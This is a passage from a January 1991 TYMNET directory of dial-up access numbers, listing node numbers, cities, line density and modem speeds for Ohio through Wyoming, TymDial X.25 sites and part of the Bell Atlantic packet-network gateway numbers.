03543   COLUMBUS             OHIO           HIGH 614/221-1862
04444 # COLUMBUS             OHIO           HIGH 614/221-1612  2400/MNP
04525 + COLUMBUS             OHIO           HIGH 614/224-0422  9600
02570   DAYTON               OHIO           MED  513/898-0124
07223 # DAYTON               OHIO           MED  513/898-0696  2400/MNP
10603 # ELYRIA               OHIO           LOW  216/324-7156  300-2400/MNP
10212   HAMILTON             OHIO           LOW  513/874-1744
02376 # LIMA                 OHIO           LOW  419/228-6343  300-2400/MNP
07472 # MANSFIELD            OHIO           LOW  419/529-3303  300-2400/MNP
03775 # NEWARK               OHIO           LOW  614/345-8953  300-2400/MNP
04252 # SPRINGFIELD          OHIO           LOW  513/325-0511  300-2400/MNP
04074 # STEUBENVILLE/WNTSVL  OHIO           LOW  614/266-2170  300-2400/MNP
03566   TOLEDO               OHIO           MED  419/255-7790
11300 # TOLEDO               OHIO           LOW  419/255-7705  2400/MNP
07333 # WARREN               OHIO           LOW  216/392-2542  300-2400/MNP
04074 # WINTERSVILLE         OHIO           LOW  614/266-2170  300-2400/MNP
04222 # YOUNGSTOWN           OHIO           LOW  216/759-8892  300-2400/MNP

07336 # ARDMORE              OKLAHOMA       LOW  405/226-1260  300-2400/MNP
03547 # ENID                 OKLAHOMA       LOW  405/242-0113  300-2400/MNP
02263 # LAWTON               OKLAHOMA       LOW  405/353-6987  300-2400/MNP
06501   OKLAHOMA CITY        OKLAHOMA       HIGH 405/495-8201
06507 # OKLAHOMA CITY        OKLAHOMA       HIGH 405/495-9201  2400/MNP
06506 + OKLAHOMA CITY        OKLAHOMA       HIGH 405/787-0684  9600/MNP
03166   TULSA                OKLAHOMA       HIGH 918/585-2010
03167 # TULSA                OKLAHOMA       HIGH 918/585-2706  2400/MNP
03051 + TULSA                OKLAHOMA       HIGH 918/585-8400  9600/MNP

07675   DUNDAS               ONTARIO        CANH 416/628-5908  300-2400/MNP
07675   HAMILTON/DUNDAS      ONTARIO        CANH 416/628-5908  300-2400/MNP
06754 # KITCHENER            ONTARIO        CANL 519/742-7613  300-2400/MNP
10122   OTTAWA               ONTARIO        CANH 613/563-2910
10122   OTTAWA               ONTARIO        CANH 613/563-2970  2400 BPS
05773 # TORONTO              ONTARIO        CANH 416/365-7630  300-2400/MNP
06003 # TORONTO              ONTARIO        CANH 416/365-7630  300-2400/MNP
04757 # WINDSOR              ONTARIO        CANL 519/977-7256  300-2400/MNP

10100 # CORVALLIS            OREGON         LOW  503/757-6341  300-2400/MNP
11013 # EUGENE               OREGON         LOW  503/343-0044  300-2400/MNP
03123 # MEDFORD              OREGON         LOW  503/772-0831  300-2400/MNP
07147   PORTLAND             OREGON         HIGH 503/222-0900
07145 # PORTLAND             OREGON         HIGH 503/222-2151  2400/MNP
07144 # PORTLAND             OREGON         HIGH 503/222/2151  2400/MNP
04327 # SALEM                OREGON         LOW  503/370-4314  300-2400/MNP
11013 # SPRINGFIELD/EUGENE   OREGON         LOW  503/343-0044  300-2400/MNP

03662 # ALLENTOWN/BETHLEHEM  PENNSYLVANIA   MED  215/865-6978  300-2400/MNP
05526 # ALTOONA              PENNSYLVANIA   LOW  814/943-5848  300-2400/MNP
11301   ALTOONA              PENNSYLVANIA   MED  814/946-8639  PDN
03662 # BETHLEHEM            PENNSYLVANIA   MED  215/865-6978  300-2400/MNP
03204   BUTLER               PENNSYLVANIA   LOW  412/283-2286


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE17

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
05537 # COATESVILLE          PENNSYLVANIA   LOW  215/383-0440  300-2400/MNP
05537 # DOWNINGTON/COATSVLLE PENNSYLVANIA   LOW  215/383-0440  300-2400/MNP
03623 # ERIE                 PENNSYLVANIA   LOW  814/456-8501  300-2400/MNP
07217 # GREENSBURG           PENNSYLVANIA   LOW  412/836-4470  300-2400/MNP
11301 # HARRISBURG/LEMOYNE   PENNSYLVANIA   MED  717/975-9881  2400/MNP
10170   JOHNSTOWN            PENNSYLVANIA   LOW  814/539-5059
02450 # KINGOFPRUSSA/NORSTWN PENNSYLVANIA   MED  215/666-9190  300-2400/MNP
11231 # LANCASTER            PENNSYLVANIA   LOW  717/569-1081  300-2400/MNP
07217 # LATROBE/GREENSBURG   PENNSYLVANIA   LOW  412/836-4470  300-2400/MNP
03643   LEMOYNE              PENNSYLVANIA   MED  717/763-6481
11301 # LEMOYNE              PENNSYLVANIA   MED  717/975-9881  2400/MNP
07331   LEVITTOWN            PENNSYLVANIA   LOW  215/943-3700
07216 # MT. PENN             PENNSYLVANIA   LOW  215/779-9580  300-2400/MNP
02760 # NEW CASTLE           PENNSYLVANIA   LOW  412/658-5056  300-2400/MNP
02450 # NORRISTOWN           PENNSYLVANIA   MED  215/666-9190  300-2400/MNP
02145 + NORRISTOWN           PENNSYLVANIA   HIGH 215/668-1984  9600 BPS
07656 # NORRISTOWN           PENNSYLVANIA   WATS 800/###-####  300-2400/MNP
07655 # NORRISTOWN           PENNSYLVANIA   WATS 800/###-####  300-2400/MNP
04372 # NORRISTOWN           PENNSYLVANIA   WATS 800/###-####  300-2400/MNP
02346 # NORRISTOWN           PENNSYLVANIA   WATS 800/###-####  300-2400/MNP
03263   PHILADELPHIA         PENNSYLVANIA   HIGH 215/592-8309
04223   PHILADELPHIA         PENNSYLVANIA   HIGH 215/592-8309
05277 # PHILADELPHIA         PENNSYLVANIA   HIGH 215/592-8750  2400/MNP
11417 # PHILADELPHIA         PENNSYLVANIA   HIGH 215/592-8750  2400/MNP
04666   PITTSBURGH           PENNSYLVANIA   HIGH 412/642-6778
04667 # PITTSBURGH           PENNSYLVANIA   HIGH 412/642-2015  2400/MNP
06570 + PITTSBURGH           PENNSYLVANIA   LOW  412/642-2271  9600
07216 # READING/MT. PENN     PENNSYLVANIA   LOW  215/779-9580  300-2400/MNP
04464 # SCRANTON             PENNSYLVANIA   LOW  717/348-0765  300-2400/MNP
10615   SECANE               PENNSYLVANIA   LOW  215/543-3045
06675 # STATE COLLEGE        PENNSYLVANIA   LOW  814/234-3853  300-2400/MNP
02450 # VALLEY FORGE/NORSTWN PENNSYLVANIA   MED  215/666-9190  300-2400/MNP
03125 # WILKES BARRE         PENNSYLVANIA   LOW  717/826-8991  300-2400/MNP
07747   WILLIAMSPORT         PENNSYLVANIA   LOW  717/323-0386
10071 # YORK                 PENNSYLVANIA   LOW  717/852-8186  2400/MNP

03322   MAYAQUEZ             PUERTO RICO    INTL 800/462-4213
03322   PONCE                PUERTO RICO    INTL 800/462-4213
07176   SAN JUAN             PUERTO RICO    INTL 809/725-1882
07176   SAN JUAN             PUERTO RICO    INTL 809/725-4343

10612   MONTREAL/ST. LAURENT QUEBEC         CANH 514/747-2996
10612   MONTREAL/ST. LAURENT QUEBEC         CANH 514/747-1370  2400 BPS
10464 # QUEBEC CITY          QUEBEC         CANH 418/647-1116  300-2400/MNP
10612   VILLE ST. LAURENT    QUEBEC         CANH 514/747-2996
10612   VILLE ST. LAURENT    QUEBEC         CANH 514/747-1370  2400 BPS
03422 + VILLE ST. LAURENT    QUEBEC         CANL 514/748-8057  9600 BPS

07214   MIDDLETOWN           RHODE ISLAND   LOW  401/849-1660
06522   PROVIDENCE           RHODE ISLAND   HIGH 401/273-0200
05524 # PROVIDENCE           RHODE ISLAND   HIGH 401/274-7380  2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE18

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
05524 # WARWICK/PROVIDENCE   RHODE ISLAND   HIGH 401/274-7380  2400/MNP
07736   WOONSOCKET           RHODE ISLAND   LOW  401/765-5994

06056   SAIPAN               SAIPAN         INTL 671/234-1121  300/1200 BPS

11162 # CHARLESTON           SOUTH CAROLINA LOW  803/553-0860  300-2400/MNP
03266   COLUMBIA             SOUTH CAROLINA MED  803/254-7563
11237 # COLUMBIA             SOUTH CAROLINA MED  803/252-7375  300-2400/MNP
10604 # FLORENCE             SOUTH CAROLINA LOW  803/664-0550  300-2400/MNP
03634   GREENVILLE           SOUTH CAROLINA MED  803/271-9213
11240 # GREENVILLE           SOUTH CAROLINA MED  803/233-5621  2400/MNP
02555 # MYRTLE BEACH         SOUTH CAROLINA LOW  803/448-5401  300-2400/MNP
06343   SPARTANBURG          SOUTH CAROLINA LOW  803/585-0016

02566 # PIERRE               SOUTH DAKOTA   LOW  605/224-7700  300-2400/MNP
05013 # RAPID CITY           SOUTH DAKOTA   LOW  605/341-4007  300-2400/MNP
05710 # SIOUX FALLS          SOUTH DAKOTA   LOW  605/334-0085  300-2400/MNP

02432 # CHATTANOOGA          TENNESSEE      MED  615/265-1020  300-2400/MNP
05253 # CLARKESVILLE         TENNESSEE      LOW  615/645-8877  300-2400/MNP
04771 # JACKSON              TENNESSEE      LOW  901/423-1244  300-2400/MNP
10506 # JOHNSON CITY         TENNESSEE      LOW  615/928-9544  300-2400/MNP
02711 # KINGSPORT            TENNESSEE      LOW  615/378-5746  300-2400/MNP
03420   KNOXVILLE            TENNESSEE      MED  615/690-1543
10044 # KNOXVILLE            TENNESSEE      MED  615/693-0498  2400/MNP
04257   MEMPHIS              TENNESSEE      MED  901/527-8006
03615 # MEMPHIS              TENNESSEE      MED  901/527-8122  2400/MNP
05523   NASHVILLE            TENNESSEE      HIGH 615/885-3530
04334 # NASHVILLE            TENNESSEE      HIGH 615/889-5790  2400/MNP
11315 # OAKRIDGE             TENNESSEE      LOW  615/482-1466  300-2400/MNP
02057 # SEVIERVILLE          TENNESSEE      LOW  615/453-0401  300-2400/MNP

10301 # ABILENE              TEXAS          LOW  915/676-0091  300-2400/MNP
10542 # ALLEN/McKINNEY       TEXAS          LOW  214/542-2641  300-2400/MNP
11267 # AMARILLO             TEXAS          LOW  806/355-7088  300-2400/MNP
04277   ARLINGTON/FORT WORTH TEXAS          MED  817/877-3630
10470 # ARLINGTON/FORT WORTH TEXAS          MED  817/332-9397  2400/MNP
02754   AUSTIN               TEXAS          HIGH 512/444-3280
04440 # AUSTIN               TEXAS          HIGH 512/448-1096  2400/MNP
03523 + AUSTIN               TEXAS          LOW  512/448-4611  9600
07717 # BAYTOWN              TEXAS          LOW  713/420-3389  300-2400/MNP
04340 # BROWNSVILLE          TEXAS          LOW  512/548-1331  300-2400/MNP
05734 # BRYAN                TEXAS          LOW  409/823-1090  300-2400/MNP
05734 # COLLEGE STATN/BRYAN  TEXAS          LOW  409/823-1090  300-2400/MNP
03127   CORPUS CHRISTI       TEXAS          MED  512/883-8050
04423 # CORPUS CHRISTI       TEXAS          MED  512/887-9621  2400/MNP
03001   DALLAS               TEXAS          HIGH 214/638-8888
02453   DALLAS               TEXAS          HIGH 214/638-8888
03443 # DALLAS               TEXAS          HIGH 214/630-5516  2400/MNP
10761 # DALLAS               TEXAS          HIGH 214/630-5516  2400/MNP
07450   DALLAS               TEXAS          HIGH 214/637-3012  9600/MNP
11251 # DENTON               TEXAS          LOW  817/565-0552  300-2400/MNP
11121 # EL PASO              TEXAS          MED  915/533-1453  300-2400/MNP
11120 # EL PASO              TEXAS          MED  915/533-1453  300-2400/MNP
04277   FORT WORTH           TEXAS          MED  817/877-3630
10470 # FORT WORTH           TEXAS          MED  817/332-9397  2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE19

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
05626   GALVESTON            TEXAS          LOW  409/762-8053
06704   HOUSTON              TEXAS          HIGH 713/556-6700
06674   HOUSTON              TEXAS          HIGH 713/556-6700
10021 # HOUSTON              TEXAS          HIGH 713/496-1332  2400/MNP
11130 # HOUSTON              TEXAS          HIGH 713/496-1332  2400/MNP
10713   HOUSTON              TEXAS          HIGH 713/870-8381  9600/MNP
11015 # KILLEEN              TEXAS          LOW  817/526-8118  300-2400/MNP
10255 # LAREDO               TEXAS          LOW  512/727-8308  300-2400/MNP
07024 # LONGVIEW             TEXAS          LOW  214/236-7475  300-2400/MNP
04330 # LUBBOCK              TEXAS          LOW  806/797-0765  300-2400/MNP
05503 # MCALLEN              TEXAS          LOW  512/631-6101  300-2400/MNP
07776   MIDLAND              TEXAS          LOW  915/561-8401
02706 # MIDLAND              TEXAS          LOW  915/683-5645  300-2400/MNP
10542 # McKINNEY             TEXAS          LOW  214/542-2641  300-2400/MNP
06350 # NEDERLAND            TEXAS          LOG  409/721-3400  300-2400/MNP
07776   ODESSA/MIDLAND       TEXAS          LOW  915/561-8401
02706 # ODESSA/MIDLAND       TEXAS          LOW  915/683-5645  300-2400/MNP
06350 # PORT ARTHUR          TEXAS          LOW  409/721-3400  300-2400/MNP
07522 # SAN ANGELO           TEXAS          LOW  915/658-4590  300-2400/MNP
02753   SAN ANTONIO          TEXAS          HIGH 512/225-8002
06225 + SAN ANTONIO          TEXAS          HIGH 512-225-3213  9600
02735 # SAN ANTONIO          TEXAS          HIGH 512/222-9877  2400/MNP
02630 # SHERMAN              TEXAS          LOW  214/868-0089  300-2400/MNP
04466 # TEMPLE               TEXAS          LOW  817/773-0982  300-2400/MNP
02446 # TEXARKANA            TEXAS          LOW  214/792-4521  300-2400/MNP
05626   TEXAS CITY/GALVESTON TEXAS          LOW  409/762-8053
02557 # TYLER                TEXAS          LOW  214/581-8652  300-2400/MNP
11754 # VICTORIA             TEXAS          LOW  512/576-9200  300-2400/MNP
11014 # WACO                 TEXAS          LOW  817/776-0880  300-2400/MNP
05415 # WICHITA FALLS        TEXAS          LOW  817/723-2386  300-2400/MNP

07510   ST THOMAS            US VIRGIN ISL  INTL 809/774-7099  300 BPS
07510   ST THOMAS            US VIRGIN ISL  INTL 809/776-7084  1200 BPS

07226   OGDEN                UTAH           LOW  801/393-5280
11053   PROVO                UTAH           LOW  801/373-2192
02737   SALT LAKE            UTAH           HIGH 801/364-0780
04447 # SALT LAKE            UTAH           HIGH 801/533-8152  2400/MNP

07107   BARRE/MONTPELIER     VERMONT        LOW  802/229-4508
05104 # BURLINGTON           VERMONT        LOW  802/864-5714  300-2400/MNP
07107   MONTPELIER           VERMONT        LOW  802/229-4508

02544   ALEXANDRIA/FAIRFAX   VIRGINIA       HIGH 703/691-8200
02545   ALEXANDRIA/FAIRFAX   VIRGINIA       HIGH 703/691-8200
04346   ALEXANDRIA/FAIRFAX   VIRGINIA       HIGH 703/691-8200
02035 # ALEXANDRIA/FAIRFAX   VIRGINIA       HIGH 703/352-3136  2400/MNP
04075 # ALEXANDRIA/FAIRFAX   VIRGINIA       HIGH 703/352-3136  2400/MNP
06256   ALEXANDRIA/FAIRFAX   VIRGINIA       HIGH 703/385-7587  9600/MNP
02544   ARLINGTON/FAIRFAX    VIRGINIA       HIGH 703/691-8200
02545   ARLINGTON/FAIRFAX    VIRGINIA       HIGH 703/691-8200
04346   ARLINGTON/FAIRFAX    VIRGINIA       HIGH 703/691-8200
02035 # ARLINGTON/FAIRFAX    VIRGINIA       HIGH 703/352-3136  2400/MNP
04075 # ARLINGTON/FAIRFAX    VIRGINIA       HIGH 703/352-3136  2400/MNP
06256   ARLINGTON/FAIRFAX    VIRGINIA       HIGH 703/385-7587  9600/MNP
04346   BETHESDA             VIRGINIA       HIGH 703/691-8200


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE20

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
10516 # CHARLOTTESVILLE      VIRGINIA       LOW  804/977-5661  300-2400/MNP
02544   FAIRFAX              VIRGINIA       HIGH 703/691-8200
02545   FAIRFAX              VIRGINIA       HIGH 703/691-8200
04346   FAIRFAX              VIRGINIA       HIGH 703/691-8200
04076 # FAIRFAX              VIRGINIA       HIGH 703/352-3136  2400/MNP
02035 # FAIRFAX              VIRGINIA       HIGH 703/352-3136  2400/MNP
04075 # FAIRFAX              VIRGINIA       HIGH 703/352-3136  2400/MNP
06256   FAIRFAX              VIRGINIA       HIGH 703/385-7587  9600/MNP
10256 # HAMPTON              VIRGINIA       MED  804/727-0572  300-2400/MNP
11452 # HARRISONBURG         VIRGINIA       LOW  703/433-6333  300-2400/MNP
07737 # LYNCHBURG            VIRGINIA       LOW  804/846-0213  300-2400/MNP
06715   MIDLOTHIAN/RICHMOND  VIRGINIA       MED  804/330-2465
10115 # MIDLOTHIAN/RICHMOND  VIRGINIA       MED  804/330-2673  2400/MNP
07676 # NEWPORT NEWS         VIRGINIA       MED  804/596-0898  2400/MNP
04313   NORFOLK              VIRGINIA       MED  804/855-7751
10346 # NORFOLK              VIRGINIA       MED  804/857-0148  2400/MNP
07372 # PETERSBURG           VIRGINIA       LOW  804/861-1788  300-2400/MNP
04313   PORTSMOUTH/NORFOLK   VIRGINIA       MED  804/855-7751
10346 # PORTSMOUTH/NORFOLK   VIRGINIA       MED  804/857-0148  2400/MNP
06715   RICHMOND             VIRGINIA       MED  804/330-2465
10115 # RICHMOND             VIRGINIA       MED  804/330-2673  2400/MNP
04121 # ROANOKE              VIRGINIA       LOW  703/344-2762  300-2400/MNP
04313   VIRGINIA BCH/NORFLK  VIRGINIA       MED  804/855-7751
10346 # VIRGINIA BCH/NORFLK  VIRGINIA       MED  804/857-0148  2400/MNP
02435 # WILLIAMSBURG         VIRGINIA       LOW  804/229-6786  300-2400/MNP

07631 # AUBURN               WASHINGTON     LOW  206/735-3975  300-2400/MNP
02503   BELLEVUE/SEATTLE     WASHINGTON     HIGH 206/285-0109
04004   BELLEVUE/SEATTLE     WASHINGTON     HIGH 206/285-0109
02703 # BELLEVUE/SEATTLE     WASHINGTON     HIGH 206/281-7141  2400/MNP
04706 # BELLEVUE/SEATTLE     WASHINGTON     HIGH 206/281-7141  2400/MNP
04453   BELLEVUE/SEATTLE     WASHINGTON     HIGH 206/283-3677  9600/MNP
06551 # BELLINGHAM           WASHINGTON     LOW  206/671-5990  300-2400/MNP
05550 # BREMERTON            WASHINGTON     LOW  206/377-2792  300-2400/MNP
07631 # ENUMCLAW/AUBURN      WASHINGTON     LOW  206/735-3975  300-2400/MNP
06564   EVERETT              WASHINGTON     LOW  206/258-1018
05514 # LONGVIEW             WASHINGTON     LOW  206/423-9072  300-2400/MNP
06563   OLYMPIA              WASHINGTON     LOW  206/943-9050
03774 # PORT ANGELES         WASHINGTON     LOW  206/452-6800  300-2400/MNP
06046 # PULLMAN              WASHINGTON     LOW  509/332-3760  300-2400/MNP
02564 # RICHLAND             WASHINGTON     MED  509/375-3367  300-2400/MNP
04004   SEATTLE              WASHINGTON     HIGH 206/285-0109
02503   SEATTLE              WASHINGTON     HIGH 206/285-0109
02703 # SEATTLE              WASHINGTON     HIGH 206/281-7141  2400/MNP
04706 # SEATTLE              WASHINGTON     HIGH 206/281-7141  2400/MNP
04453   SEATTLE              WASHINGTON     HIGH 206/283-3677  9600/MNP
05260   SPOKANE              WASHINGTON     MED  509/624-1549
11016 # SPOKANE              WASHINGTON     LOW  509/747-3011  2400/MNP
04020 # TACOMA               WASHINGTON     LOW  206/572-2026  300-2400/MNP
04061 # TACOMA               WASHINGTON     LOW  206/572-2026  300-2400/MNP
11252 # VANCOUVER            WASHINGTON     LOW  206/574-0427  300-2400/MNP
02124 # YAKIMA               WASHINGTON     LOW  509/248-1462  300-2400/MNP

03661 # CHARLESTON           WEST VIRGINIA  LOW  304/345-9575  300-2400/MNP
07371 # HUNTINGTON           WEST VIRGINIA  LOW  304/523-8432  300-2400/MNP
03112 # MORGANTOWN           WEST VIRGINIA  LOW  304/292-3092  300-2400/MNP


TYMNET ACCESS SORTED BY STATE                1/03/1991               PAGE21

NODE    CITY                 STATE          DEN  ACCESS NUMBER COMMENT
-----   -------------------- -------------- ---- ------------- -------------
07243 # PARKERSBURG          WEST VIRGINIA  LOW  304/485-9470  300-2400/MNP
03112 # WESTOVER/MORGANTOWN  WEST VIRGINIA  LOW  304/292-3092  300-2400/MNP
02771 # WHEELING             WEST VIRGINIA  LOW  304/233-7676  300-2400/MNP

07651 # APPLETON             WISCONSIN      LOW  414/730-8029  300-2400/MNP
07460 # BELOIT               WISCONSIN      LOW  608/362-4655  300-2400/MNP
02440   BROOKFIELD           WISCONSIN      HIGH 414/785-1614
04703 # BROOKFIELD           WISCONSIN      HIGH 414/785-0630  2400/MNP
05544   BROOKFIELD           WISCONSIN      HIGH 414/796-1087  9600/MNP
02301 # EAU CLAIRE           WISCONSIN      LOW  715/833-0121  300-2400/MNP
03651 # GREEN BAY            WISCONSIN      LOW  414/432-3064  300-2400/MNP
07460 # JANESVILLE/BELOIT    WISCONSIN      LOW  608/362-4655  300-2400/MNP
07305 # KENOSHA              WISCONSIN      LOW  414/553-9044  300-2400/MNP
02720 # LA CROSSE            WISCONSIN      LOW  608/784-9099  300-2400/MNP
07664 # MADISON              WISCONSIN      LOW  608/221-0891  300-2400/MNP
04703 # MILWAUKEE/BROOKFIELD WISCONSIN      HIGH 414/785-0630  2400/MNP
04770 # OSHKOSH              WISCONSIN      LOW  414/235-7473  300-2400/MNP
07305 # RACINE/KENOSHA       WISCONSIN      LOW  414/553-9044  300-2400/MNP
10261 # SHEBOYGAN            WISCONSIN      LOW  414/457-6128  300-2400/MNP
05365 # WAUSAU               WISCONSIN      LOW  715/848-6171  300-2400/MNP
11752 # WEST BEND            WISCONSIN      LOW  414/334-1755  300-2400/MNP

02050 # CASPER               WYOMING        LOW  307/234-4211  300-2400/MNP
02163 # CHEYENNE             WYOMING        LOW  307/638-0403  300-2400/MNP
06221 # LARAMIE              WYOMING        LOW  307/742-9441  300-2400/MNP

TymDial X.25 (R) Access Numbers


The following locations have been installed as TymDial X.25 sites.  800
Service will be available soon.

                 2400 bps      9600 bps       (2400)  (9600)
State, City       Access #      Access #       Host #  Host #   Node #
----------------  ------------  ------------   ------  ------   ------
AZ, Phoenix       602/254-3423  602/257-0629   11744   11747    3664
CA, Los Angeles   213/588-4639  213/588-4712   2622    5800     6733
CA, Newport Beach 714/250-3208  714/250-4909   11158   11159    5461
CA, Oakland       415/568-3551  415/568-1662   3282    6924     2076
CA, Sacramento    916/442-0841  916/442-0851   2106    2449     7543
CA, San Diego     619/497-0040  619/497-0042   8855    8602     3057
CA, San Francisco 415/896-5569  415/896-5578   3397    7377     3041
CA, San Jose      408/954-8476  408/954-8481   11153   11154    10242
CO, Denver        303/830-9008  303/830-9032   2621    10016    2571
CT, Bloomfield    203/243-8327  203/286-0712   3389    4555     5333
DC  Washington    703/352-2216  703/352-2218   8885    8117     6262
FL, Miami         305/599-9993  305/599-9996   8883    8997     7720
FL, Tampa         813/933-7561  813/933-7095   7609    1598     4141
GA, Atlanta       404/455-7540  404/455-9285   8880    8996     10211
IL, Chicago       312/427-1453  312/427-1506   8882    913      6313
MA, Boston        617/439-7626  617/439-7628   8881    8115     2253
MD, Baltimore     301/659-7410  301/659-7430   5861    6238     5023
MI, Detroit       313/965-4980  313/965-4982   10439   10440    4355
MN, Minneapolis   612/332-2345  612/332-2580   11151   11152    5410
MO, St. Louis     314/731-4507  314/731-7841   11155   11156    5726
MO, Kansas City   913/677-5002  913/384-0590   1846    6835     3346
NJ, Newark        201/824-4128  201/824-4130   3752    3775     10110
NJ, S. Brunswick  609/452-8640  609/452-8011   11646   11645    10153
NJ, Union City    201/617-9103  201-617-9110   11654   11656    11305
NY, Hempstead     516/292-6002  516/486-2095   11613   11614    3540
NY, New York      212/797-2790  212/797-2792   8884    916      7057
NY, Rochester     716/586-0820  716/586-4858   11667   11669    7162
OH, Cincinnati    513/489-2664  513/489-2435   11742   11743    2051
OH, Cleveland     216/696-0531  216/696-0363   3434    4155     10234
OH, Columbus      614/224-0427  614/224-0436   8752    8753     10040
OH, Dayton        513/454-3692  513/454-5048   11820   11821    3267
OR, Portland      503/225-0812  503/225-1233   11134   11135    10151
PA, Philadelphia  215/629-0555  215/629-0559   1104    9838     3457
PA, Pittsburgh    412/642-2235  412/642-7703   3462    9725     10264
TX, Dallas        214/634-0831  214/634-0833   3167    6209     5402
TX, Houston       713/589-7591  713/589-7593   10892   10893    10021
UT, Salt Lake C.  801/364-6902  801/364-7439   11609   11610    11500
WA, Seattle       206/285-5188  206/285-5247   11161   11162    4005
WI, Milwaukee     414/796-1802  414/796-2908   11754   11755    5544


  TYMNET has gateways into many of the Regional Bell Operating
  Company packet networks.  For specifics on how to access these
  networks, please refer to the information listed at the end of
  each company section.

                               BELL ATLANTIC

NODE    CITY                  STATE           SPEED    ACCESS NUMBER  NTWK
----   -------------------    --------------  ------   ------------   ----
03526   DOVER                 DELAWARE        300/2400 302/734-9465   @PDN
03526   GEORGETOWN            DELAWARE        300/2400 302/856-7055   @PDN
03526   NEWARK                DELAWARE        300/2400 302/366-0800   @PDN
03526   WILMINGTON            DELAWARE        300/1200 302/428-0030   @PDN
03526   WILMINGTON            DELAWARE        2400     302/655-1144   @PDN

06254   WASHINGTON            DIST. OF COL.   300/1200 202/479-7214   @PDN
06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   2400     202/785-1688   @PDN
06254   WASHINGTON (DOWNTOWN) DIST. OF COL.   300/1200 202/393-6003   @PDN
06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   300/1200 202/293-4641   @PDN
06254   WASHINGTON            DIST. OF COL.   300/1200 202/546-5549   @PDN
06254   WASHINGTON            DIST. OF COL.   300/1200 202/328-0619   @PDN

06254   BETHESDA              MARYLAND        300/1200 301/986-9942   @PDN
06254   COLESVILLE            MARYLAND        300/2400 301/989-9324   @PDN
06254   HYATTSVILLE           MARYLAND        300/1200 301/779-9935   @PDN
06254   LAUREL                MARYLAND        300/2400 301/490-9971   @PDN
06254   ROCKVILLE             MARYLAND        300/1200 301/340-9903   @PDN
06254   SILVER SPRING         MARYLAND        300/1200 301/495-9911   @PDN

07771   BERNARDSVILLE         NEW JERSEY      300/2400 201/766-7138   @PDN
07771   CLINTON               NEW JERSEY      300-1200 201/730-8693   @PDN
07771   DOVER                 NEW JERSEY      300/2400 201/361-9211   @PDN
07771   EATONTOWN/RED BANK    NEW JERSEY      300/2400 201/758-8000   @PDN
07771   ELIZABETH             NEW JERSEY      300/2400 201/289-5100   @PDN
07771   ENGLEWOOD             NEW JERSEY      300/2400 201/871-3000   @PDN
07771   FREEHOLD              NEW JERSEY      300/2400 201/780-8890   @PDN
07771   HACKENSACK            NEW JERSEY      300/2400 201/343-9200   @PDN
07771   JERSEY CITY           NEW JERSEY      300/2400 201/659-3800   @PDN
07771   LIVINGSTON            NEW JERSEY      300/2400 201/533-0561   @PDN
07771   LONG BRANCH/RED BANK  NEW JERSEY      300/2400 201/758-8000   @PDN
07771   MADISON               NEW JERSEY      300/2400 201/593-0004   @PDN
07771   METUCHEN              NEW JERSEY      300/2400 201/906-9500   @PDN
07771   MIDDLETOWN            NEW JERSEY      300/2400 201/957-9000   @PDN
07771   MORRISTOWN            NEW JERSEY      300/2400 201/455-0437   @PDN
07771   NEWARK                NEW JERSEY      300/2400 201/623-0083   @PDN
07771   NEW BRUNSWICK         NEW JERSEY      300/2400 201/247-2700   @PDN
07771   NEW FOUNDLAND         NEW JERSEY      300/2400 201/697-9380   @PDN
07771   PASSAIC               NEW JERSEY      300/2400 201/473-6200   @PDN
07771   PATERSON              NEW JERSEY      300/2400 201/345-7700   @PDN
07771   PHILLIPSBURG          NEW JERSEY      300/2400 201/454-9270   @PDN
07771   POMPTON LAKES         NEW JERSEY      300/2400 201/835-8400   @PDN
07771   RED BANK              NEW JERSEY      300/2400 201/758-8000   @PDN
07771   RIDGEWOOD             NEW JERSEY      300/2400 201/445-4800   @PDN
07771   SOMERVILLE            NEW JERSEY      300/2400 201/218-1200   @PDN
07771   SOUTH RIVER           NEW JERSEY      300/2400 201/390-9100   @PDN
07771   SPRING LAKE           NEW JERSEY      300/2400 201/974-0850   @PDN
07771   TOMS RIVER            NEW JERSEY      300/2400 201/286-3800   @PDN
07771   WASHINGTON            NEW JERSEY      300/2400 201/689-6894   @PDN
07771   WAYNE/PATERSON        NEW JERSEY      300/2400 201/345-7700   @PDN

03526   ALLENTOWN             PENNSYLVANIA    300/1200 215/435-0266   @PDN
11301   ALTOONA               PENNSYLVANIA    300/1200 814/946-8639   @PDN
11301   ALTOONA               PENNSYLVANIA    2400     814/949-0505   @PDN
03526   AMBLER                PENNSYLVANIA    300/1200 215/283-2170   @PDN
10672   AMBRIDGE              PENNSYLVANIA    300/1200 412/266-9610   @PDN
10672   CARNEGIE              PENNSYLVANIA    300/1200 412/276-1882   @PDN
10672   CHARLEROI             PENNSYLVANIA    300/1200 412/483-9100   @PDN
03526   CHESTER HEIGHTS       PENNSYLVANIA    300/1200 215/358-0820   @PDN
03526   COATESVILLE           PENNSYLVANIA    300/1200 215/383-7212   @PDN
10672   CONNELLSVILLE         PENNSYLVANIA    300/1200 412/628-7560   @PDN
03526   DOWNINGTON/COATES.    PENNSYLVANIA    300/1200 215/383-7212   @PDN
03562   DOYLESTOWN            PENNSYLVANIA    300/1200 215/340-0052   @PDN
03562   GERMANTOWN            PENNSYLVANIA    300/1200 215-843-4075   @PDN
10672   GLENSHAW              PENNSYLVANIA    300/1200 412/487-6868   @PDN
10672   GREENSBURG            PENNSYLVANIA    300/1200 412/836-7840   @PDN
11301   HARRISBURG            PENNSYLVANIA    300/1200 717/236-3274   @PDN
11301   HARRISBURG            PENNSYLVANIA    2400     717/238-0450   @PDN
10672   INDIANA               PENNSYLVANIA    300/1200 412/465-7210   @PDN
03526   KING OF PRUSSIA       PENNSYLVANIA    300/1200 215/270-2970   @PDN
03526   KIRKLYN               PENNSYLVANIA    300/1200 215/789-5650   @PDN
03526   LANSDOWNE             PENNSYLVANIA    300/1200 215/626-9001   @PDN
